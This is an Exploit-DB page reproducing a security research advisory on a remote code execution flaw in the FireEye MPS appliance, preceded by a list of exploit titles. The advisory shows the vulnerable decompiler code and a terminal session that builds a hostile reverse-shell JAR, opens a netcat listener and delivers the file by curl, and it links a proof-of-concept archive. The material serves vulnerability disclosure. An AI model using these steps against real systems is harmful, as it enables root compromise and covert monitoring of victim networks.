ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
69 lines
No EOL
3.2 KiB
Text
69 lines
No EOL
3.2 KiB
Text
Source: https://code.google.com/p/google-security-research/issues/detail?id=666
|
|
|
|
The FireEye MPS (Malware Protection System) is vulnerable to a remote code execution vulnerability, simply from monitoring hostile traffic. FireEye is designed to operate as a passive network tap, so that it can see all the files and emails that enter a monitored network.
|
|
|
|
This vulnerability allows an attacker to compromise the FireEye device, get a root shell and start monitoring all traffic on the victim network (emails, attachments, downloads, web browsing, etc). This is about the worst possible vulnerability that you can imagine for a FireEye user, it literally does not get worse than this.
|
|
|
|
This bug is in one of the analysis tools used by the MIP (Malware Input Processor), which has various tools for analysis of different file types. One of these tools is a script that attempts to decompile Java Archives, then runs some simple regexes over the decompiled code:
|
|
|
|
$ grep subprocess.Popen /opt/fireeye/scripts/mip/content/jar.py
|
|
sp = subprocess.Popen(yara_cmd,stdout=outfile)
|
|
sp = subprocess.Popen(cmd_list,stdout=outfile,stderr=errfile)
|
|
sp = subprocess.Popen(jarsigner_cmd,stdout=outfile,stderr=errfile)
|
|
|
|
The decompiler used is actually a modified version of JODE, an ancient opensource decompiler written in Java:
|
|
|
|
http://jode.sourceforge.net/
|
|
|
|
Examining the source code for JODE, it supports a "String Deobfuscation" feature that relies on reflection, this is visible here:
|
|
|
|
|
|
http://sourceforge.net/p/jode/code/HEAD/tree/trunk/jode/src/net/sf/jode/expr/InvokeOperator.java
|
|
|
|
public Object invokeMethod(Reference ref, boolean isVirtual,
|
|
Object cls, Object[] params)
|
|
throws InterpreterException, InvocationTargetException {
|
|
if (cls == null && ref.getClazz().equals(classSig)) {
|
|
BasicBlocks bb = classInfo
|
|
.findMethod(ref.getName(), ref.getType())
|
|
.getBasicBlocks();
|
|
if (bb != null)
|
|
return interpreter.interpretMethod(bb, null, params);
|
|
throw new InterpreterException
|
|
("Can't interpret static native method: "+ref);
|
|
} else
|
|
return super.invokeMethod(ref, isVirtual, cls, params);
|
|
}
|
|
}
|
|
|
|
By carefully crafting a class file that passes JODE's test for obfuscation, we were able to invoke arbitrary methods using reflection. We did this using the jasmin compiler:
|
|
|
|
|
|
# create the hostile JAR
|
|
$ jasmin ReverseShell.j
|
|
$ jar cvf fireeye.jar ReverseShell.class
|
|
added manifest
|
|
adding: ReverseShell.class(in = 489) (out= 311)(deflated 36%)
|
|
|
|
# Now start a reverse shell listening
|
|
$ nc -lp 9090 &
|
|
[1] 11115
|
|
|
|
# download a file over the monitored network
|
|
$ curl http://192.168.1.1/appliance-test/fireeye.jar &> /dev/null
|
|
|
|
# wait for the connect back shell attempt
|
|
$ wait
|
|
uid=821(mip) gid=3111(mip)
|
|
groups=3111(mip),602(antivirus),2000(analysis),3001(stats),3134(mip_child),3200(dipcshm),3203(reports),3204(contents),3210(mip_client)
|
|
[1]+ Done nc -lp 9090
|
|
|
|
# Code execution!
|
|
|
|
(Getting root from gid=mip_child is trivial, this is a second bug that will be filed.)
|
|
|
|
The Jasmin file we used is attached.
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39007.zip |